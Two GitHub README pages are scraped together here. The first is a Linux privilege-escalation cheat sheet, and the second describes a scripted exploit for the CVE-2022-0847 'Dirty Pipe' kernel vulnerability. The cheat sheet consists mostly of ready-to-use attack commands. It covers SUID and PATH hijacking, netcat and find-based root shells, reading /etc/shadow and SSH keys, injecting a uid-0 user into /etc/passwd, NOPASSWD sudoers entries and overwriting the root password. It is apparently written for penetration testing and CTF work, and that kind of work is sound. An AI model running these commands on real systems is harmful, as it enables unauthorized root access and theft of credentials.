- Saved searches
- Use saved searches to filter your results more quickly
- frizb/Linux-Privilege-Escalation
- Name already in use
- Sign In Required
- Launching GitHub Desktop
- Launching GitHub Desktop
- Launching Xcode
- Launching Visual Studio Code
- Latest commit
- Git stats
- Files
- README.md
- Saved searches
- Use saved searches to filter your results more quickly
- rexpository/linux-privilege-escalation
- Name already in use
- Sign In Required
- Launching GitHub Desktop
- Launching GitHub Desktop
- Launching Xcode
- Launching Visual Studio Code
- Latest commit
- Git stats
- Files
- README.md
- About
Saved searches
Use saved searches to filter your results more quickly
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session.
Tips and Tricks for Linux Priv Escalation
frizb/Linux-Privilege-Escalation
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Sign In Required
Please sign in to use Codespaces.
Launching GitHub Desktop
If nothing happens, download GitHub Desktop and try again.
Launching GitHub Desktop
If nothing happens, download GitHub Desktop and try again.
Launching Xcode
If nothing happens, download Xcode and try again.
Launching Visual Studio Code
Your codespace will open once ready.
There was a problem preparing your codespace, please try again.
Latest commit
Git stats
Files
Failed to load latest commit information.
README.md
Tips and Tricks for Linux Priv Escalation
python -c 'import pty; pty.spawn("/bin/bash")' Ctrl-Z # In Kali Note the number of rows and cols in the current terminal window $ stty -a # Next we will enable raw echo so we can use TAB autocompletes $ stty raw -echo $ fg # In reverse shell $ stty rows columns # Finally $ reset $ export SHELL=bash $ export TERM=xterm-256color Who am i and what groups do I belong to?
id
Who else is on this box (lateral movement)?
ls -la /home
cat /etc/passwd
What Kernel version and distro are we working with here?
uname -a
cat /etc/issue
What new processes are running on the server (Thanks to IPPSEC for the script!):
#!/bin/bash # Loop by line IFS=$'\n' old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0) while true; do new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0) diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>] sleep 1 old_process=$new_process done We can also use pspy on linux to monitor the processes that are starting up and running:
https://github.com/DominicBreuker/pspy
Check the services that are listening:
Who can execute code as root (probably will get a permission denied)?
cat /etc/sudoers
Can I execute code as root (you will need the user’s password)?
sudo -l
What executables have SUID bit that can be executed as another user?
find / -type f -user root -perm /u+s -ls 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb <> \;
Do any of the SUID binaries run commands that are vulnerable to file path manipulation?
strings /usr/local/bin/binaryelf
mail
echo «/bin/sh» > /tmp/mail cd /tmp
export PATH=.
/usr/local/bin/binaryelf
Do any of the SUID binaries run commands that are vulnerable to Bash Function Manipulation? strings /usr/bin/binaryelf
mail function /usr/bin/mail() < /bin/sh; >
export -f /usr/bin/mail
/usr/bin/binaryelf
Can I write files into a folder containing a SUID bit file?
Might be possible to take advantage of a ‘.’ in the PATH or an The IFS (or Internal Field Separator) Exploit.
If any of the following commands appear on the list of SUID or SUDO commands, they can be used for privledge escalation:
| SUID / SUDO Executables | Priv Esc Command (will need to prefix with sudo if you are using sudo for priv esc. |
|---|---|
| (ALL : ALL ) ALL | You can run any command as root. sudo su — sudo /bin/bash |
| nmap (older versions 2.02 to 5.21) | nmap —interactive !sh |
| netcat nc nc.traditional | nc -nlvp 4444 & nc -e /bin/bash 127.0.0.1 4444 |
| ncat | |
| awk gawk | awk ‘< print >‘ /etc/shadow awk ‘BEGIN ‘ |
| python | python -c ‘import pty;pty.spawn(«/bin/bash»)’ |
| php | |
| find | find /home -exec nc -lvp 4444 -e /bin/bash \; find /home -exec /bin/bash \; |
| xxd | |
| vi | |
| more | |
| less | |
| nano | |
| cp | |
| cat | |
| bash | |
| ash | |
| sh | |
| csh | |
| curl | |
| dash | |
| pico | |
| nano | |
| vrim | |
| tclsh | |
| git | |
| scp | |
| expect | |
| ftp | |
| socat | |
| script | |
| ssh | |
| zsh | |
| tclsh | |
| strace | Write and compile a a SUID SUID binary c++ program strace chown root:root suid strace chmod u+s suid ./suid |
| npm | ln -s /etc/shadow package.json && sudo /usr/bin/npm i * |
| rsync | |
| tar | |
| Screen-4.5.00 | https://www.exploit-db.com/exploits/41154/ |
Note: You can find an incredible list of Linux binaries that can lead to privledge escalation at the GTFOBins project website here:
https://gtfobins.github.io/
Can I access services that are running as root on the local network?
netstat -antup
ps -aux | grep root
| Network Services Running as Root | Exploit actions |
|---|---|
| mysql | raptor_udf2 exploit 0xdeadbeef.info/exploits/raptor_udf2.c insert into foo values(load_file(‘/home/smeagol/raptor_udf2.so’)); |
| apache | drop a reverse shell script on to the webserver |
| nfs | no_root_squash parameter Or if you create the same user name and matching user id as the remote share you can gain access to the files and write new files to the share |
| PostgreSQL | https://www.exploit-db.com/exploits/45184/ |
Are there any active tmux sessions we can connect to?
tmux ls
What files and folders are in my home user’s directory?
ls -la ~
Do any users have passwords stored in the passwd file? cat /etc/passwd
Are there passwords for other users or RSA keys for SSHing into the box?
ssh -i id_rsa root@10.10.10.10
Are there configuration files that contain credentials?
| Application and config file | Config File Contents |
|---|---|
| WolfCMS config.php | // Database settings: define(‘DB_DSN’, ‘mysql:dbname=wolf;host=localhost;port=3306’); define(‘DB_USER’, ‘root’); define(‘DB_PASS’, ‘john@123’); |
| Generic PHP Web App | define(‘DB_PASSWORD’, ‘s3cret’); |
| .ssh directory | authorized_keys id_rsa id_rsa.keystore id_rsa.pub known_hosts |
| User MySQL Info | .mysql_history .my.cnf |
| User Bash History | .bash_history |
Are any of the discovered credentials being reused by multiple acccounts?
sudo — username
sudo -s
Are there any Cron Jobs Running?
cat /etc/crontab
What files have been modified most recently?
find /etc -type f -printf ‘%TY-%Tm-%Td %TT %p\n’ | sort -r
find /home -type f -mmin -60
find / -type f -mtime -2
Is the user a member of the Disk group and can we read the contents of the file system?
debugfs /dev/sda
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow
Is the user a member of the Video group and can we read the Framebuffer?
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size
What are all the files can I write to?
find / -type f -writable -path /sys -prune -o -path /proc -prune -o -path /usr -prune -o -path /lib -prune -o -type d 2>/dev/null
What folder can I write to?
find / -regextype posix-extended -regex «/(sys|srv|proc|usr|lib|var)» -prune -o -type d -writable 2>/dev/null
| Writable Folder / file | Priv Esc Command |
|---|---|
| /home/USER/ | Create an ssh key and copy it to the .ssh/authorized_keys folder the ssh into the account |
| /etc/passwd | manually add a user with a password of «password» using the following syntax user:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:1000:1000. /home/user:/bin/bash You can even escalate to the root user in some cases with the following syntax: admin:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:0:0. /root:/bin/bash |
Root SSH Key If Root can login via SSH, then you might be able to find a method of adding a key to the /root/.ssh/authorized_keys file.
cat /etc/ssh/sshd_config | grep PermitRootLogin Add SUDOers If we can write arbitrary files to the host as Root, it is possible to add users to the SUDO-ers group like so (NOTE: you will need to logout and login again as myuser):
/etc/sudoers
root ALL=(ALL:ALL) ALL %sudo ALL=(ALL:ALL) ALL myuser ALL=(ALL) NOPASSWD:ALL Set Root Password We can also change the root password on the host if we can write to any file as root:
/etc/shadow
printf root:>shadown openssl passwd -1 -salt salty password >>shadow Based on the Kernel version, do we have some reliable exploits that can be used?
Ubuntu 8.10 Ubunto 9.04 Gentoo Saved searches
Use saved searches to filter your results more quickly
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session.
Scripted Linux Privilege Escalation for the CVE-2022-0847 «Dirty Pipe» vulnerability
rexpository/linux-privilege-escalation
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Sign In Required
Please sign in to use Codespaces.
Launching GitHub Desktop
If nothing happens, download GitHub Desktop and try again.
Launching GitHub Desktop
If nothing happens, download GitHub Desktop and try again.
Launching Xcode
If nothing happens, download Xcode and try again.
Launching Visual Studio Code
Your codespace will open once ready.
There was a problem preparing your codespace, please try again.
Latest commit
Git stats
Files
Failed to load latest commit information.
README.md
Linux Privilege Escalation
Bash script to check and exploit the CVE-2022-0847 Linux «Dirty Pipe» vulnerability
About this Proof of Concept
This script allows an unprivileged user on a vulnerable system to do the following:
This repo contains 2 exploits:
Replaces the root password with the password «piped» and backups the original /etc/passwd file under /tmp/passwd.bak. Then, the exploit provides you with access to an elevated root shell and restores the original passwd file when you exit the shell.
Injects and overwrites data in read-only SUID process memory that run as root.
Clone this repository and change working directory
git clone https://github.com/rexpository/linux-privilege-escalation.git cd linux-privilege-escalation Check if the current target system is vulnerable
Install GCC to compile the exploit
Compile and run the bashscript to automate the compilation of both exploits
chmod +x compile.sh ./compile.sh Run your desired exploit binary
This vulnerability resides in the pipe tool used for unidirectional communication between processes, hence the name «Dirty Pipe».
An unprivileged local user could exploit this vulnerability to overwrite supposedly read-only files in the Linux kernel and as such, escalate their privileges on the system.
This vulnerabilty occurs due to the usage of partially uninitialized memory of the pipe buffer structure during its construction. A lack of zero initialization of the new structures’s member results in a stale value of flags, which can be abused by anattacker to gain write acces to pages in the cache even if they originally were marked with a read-only attribute.
To ensure that your infrastructure is protected against this and similar threats:
- Apply all relevant security updates once they are available. To patch CVE-2022-0847, update your Linux systems to version 5.16.11, 5.15.25, and 5.10.102 or newer.
- Use a security solution that provides patch management and endpoint protection.
- Use the latest Threat Intelligence information to stay aware of actual TTPs used by threat actors.
About
Scripted Linux Privilege Escalation for the CVE-2022-0847 «Dirty Pipe» vulnerability